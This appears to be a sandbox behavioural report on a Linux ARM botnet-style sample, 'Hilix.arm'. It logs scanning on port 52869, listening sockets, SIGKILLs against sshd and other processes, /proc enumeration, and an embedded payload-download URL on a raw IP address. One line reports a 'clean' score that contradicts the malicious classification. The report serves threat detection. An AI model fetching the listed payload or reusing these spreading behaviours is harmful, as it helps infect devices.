Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.245.201.130:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.174.63.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.84.235.183:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.135.66.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.193.176.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.185.139.248:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.207.163.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.130.239.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.253.184.47:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.8.143.241:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.52.134.73:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.72.77.16:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.136.53.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.13.153.211:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.114.202.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.197.132.93:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.135.212.2:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.171.98.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.91.143.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.52.12.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.154.186.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.109.93.241:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.239.100.82:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.209.72.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.118.232.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.38.95.1:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.128.137.206:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.178.209.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.47.152.89:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.102.237.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.120.178.194:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.230.46.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.252.128.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.125.63.49:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.252.194.0:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.9.218.223:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.178.139.41:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.117.55.23:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.173.98.106:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.99.51.10:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.31.76.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.118.125.46:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.62.242.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.194.249.97:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.4.164.47:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.163.131.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.30.178.161:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.164.88.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.154.14.171:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.71.103.232:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.68.210.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.182.202.237:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.99.149.13:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.212.76.19:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.229.22.166:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.197.115.54:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.22.143.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.62.167.55:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.159.111.95:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.237.103.183:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.30.67.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.116.188.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.71.104.182:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.226.2.103:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.51.137.169:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.161.136.133:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.133.43.229:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.254.255.131:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.220.17.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.38.140.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.145.78.149:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.253.24.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.126.81.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.249.46.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.70.60.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.193.71.208:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.249.115.113:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.161.236.18:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.74.211.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.31.18.135:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.187.35.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.157.185.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.69.80.135:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.143.203.6:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.228.176.251:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.74.190.92:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.224.201.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.123.92.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.63.82.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.197.92.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.47.171.122:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.81.176.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.204.220.216:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.2.70.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.93.238.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.91.90.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.205.241.35:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.24.86.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.189.166.198:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.161.230.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.23.191.179:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.53.15.45:52869

Sample listens on a socket

Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::0	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::80	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::0	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::53413	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::80	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::37215	Jump to behavior
Source: /usr/sbin/sshd (PID: 5290)	Socket: 0.0.0.0::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5290)	Socket: [::]::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5405)	Socket: 0.0.0.0::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5405)	Socket: [::]::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5409)	Socket: 0.0.0.0::22	Jump to behavior
Source: /usr/sbin/sshd (PID: 5409)	Socket: [::]::22	Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.76.255.51
Source: unknown	TCP traffic detected without corresponding DNS query: 130.107.169.55
Source: unknown	TCP traffic detected without corresponding DNS query: 99.40.204.55
Source: unknown	TCP traffic detected without corresponding DNS query: 99.249.102.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.240.159.175
Source: unknown	TCP traffic detected without corresponding DNS query: 47.111.154.51
Source: unknown	TCP traffic detected without corresponding DNS query: 206.190.187.173
Source: unknown	TCP traffic detected without corresponding DNS query: 207.73.204.91
Source: unknown	TCP traffic detected without corresponding DNS query: 178.22.94.37
Source: unknown	TCP traffic detected without corresponding DNS query: 72.89.198.59
Source: unknown	TCP traffic detected without corresponding DNS query: 87.109.145.122
Source: unknown	TCP traffic detected without corresponding DNS query: 111.123.168.204
Source: unknown	TCP traffic detected without corresponding DNS query: 205.158.216.218
Source: unknown	TCP traffic detected without corresponding DNS query: 90.236.105.87
Source: unknown	TCP traffic detected without corresponding DNS query: 68.17.237.89
Source: unknown	TCP traffic detected without corresponding DNS query: 90.175.99.196
Source: unknown	TCP traffic detected without corresponding DNS query: 201.249.219.84
Source: unknown	TCP traffic detected without corresponding DNS query: 76.153.162.22
Source: unknown	TCP traffic detected without corresponding DNS query: 144.115.24.118
Source: unknown	TCP traffic detected without corresponding DNS query: 172.131.131.149
Source: unknown	TCP traffic detected without corresponding DNS query: 186.227.221.235
Source: unknown	TCP traffic detected without corresponding DNS query: 211.247.213.135
Source: unknown	TCP traffic detected without corresponding DNS query: 94.246.130.177
Source: unknown	TCP traffic detected without corresponding DNS query: 94.87.126.146
Source: unknown	TCP traffic detected without corresponding DNS query: 136.117.212.181
Source: unknown	TCP traffic detected without corresponding DNS query: 70.111.187.139
Source: unknown	TCP traffic detected without corresponding DNS query: 25.151.1.67
Source: unknown	TCP traffic detected without corresponding DNS query: 101.47.81.22
Source: unknown	TCP traffic detected without corresponding DNS query: 189.33.223.115
Source: unknown	TCP traffic detected without corresponding DNS query: 180.20.33.84
Source: unknown	TCP traffic detected without corresponding DNS query: 101.220.60.178
Source: unknown	TCP traffic detected without corresponding DNS query: 91.225.175.161
Source: unknown	TCP traffic detected without corresponding DNS query: 140.121.105.248
Source: unknown	TCP traffic detected without corresponding DNS query: 179.130.250.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.178.137.80
Source: unknown	TCP traffic detected without corresponding DNS query: 206.79.248.139
Source: unknown	TCP traffic detected without corresponding DNS query: 192.119.104.193
Source: unknown	TCP traffic detected without corresponding DNS query: 106.48.18.132
Source: unknown	TCP traffic detected without corresponding DNS query: 167.67.17.20
Source: unknown	TCP traffic detected without corresponding DNS query: 119.0.43.124
Source: unknown	TCP traffic detected without corresponding DNS query: 61.105.100.27
Source: unknown	TCP traffic detected without corresponding DNS query: 160.169.168.12
Source: unknown	TCP traffic detected without corresponding DNS query: 208.171.231.169
Source: unknown	TCP traffic detected without corresponding DNS query: 139.38.50.3
Source: unknown	TCP traffic detected without corresponding DNS query: 130.49.43.226
Source: unknown	TCP traffic detected without corresponding DNS query: 97.251.125.56
Source: unknown	TCP traffic detected without corresponding DNS query: 105.222.81.117
Source: unknown	TCP traffic detected without corresponding DNS query: 140.213.57.236
Source: unknown	TCP traffic detected without corresponding DNS query: 35.184.212.252
Source: unknown	TCP traffic detected without corresponding DNS query: 209.209.33.198

Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://37.0.9.202/bins/Hilix.mips
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

System Summary:

Sample tries to kill many processes (SIGKILL)

Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2180, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2191, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2208, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2275, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2281, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2285, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2289, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2294, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5248, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5257, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5260, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5290, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5405, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5246, result: unknown	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	SIGKILL sent: pid: 936, result: successful	Jump to behavior

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2180, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2191, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2208, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2275, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2281, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2285, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2289, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2294, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5248, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5257, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5260, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5290, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5405, result: successful	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5246, result: unknown	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	SIGKILL sent: pid: 936, result: successful	Jump to behavior

Source: classification engine

Classification label: mal76.spre.troj.linARM@0/6@0/0

Source: Hilix.arm

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Persistence and Installation Behavior:

Enumerates processes within the "proc" file system

Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/793/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/772/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/796/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/774/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/797/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/777/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/799/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/658/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/936/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/785/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/720/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/721/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/788/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/789/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/847/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/904/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5267/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5146/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5268/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5389/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5260/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5260/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5259/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5139/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5272/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5151/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5273/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5274/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5275/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5154/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5276/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5277/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5036/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5036/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5278/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5279/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 42190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42192 -> 52869
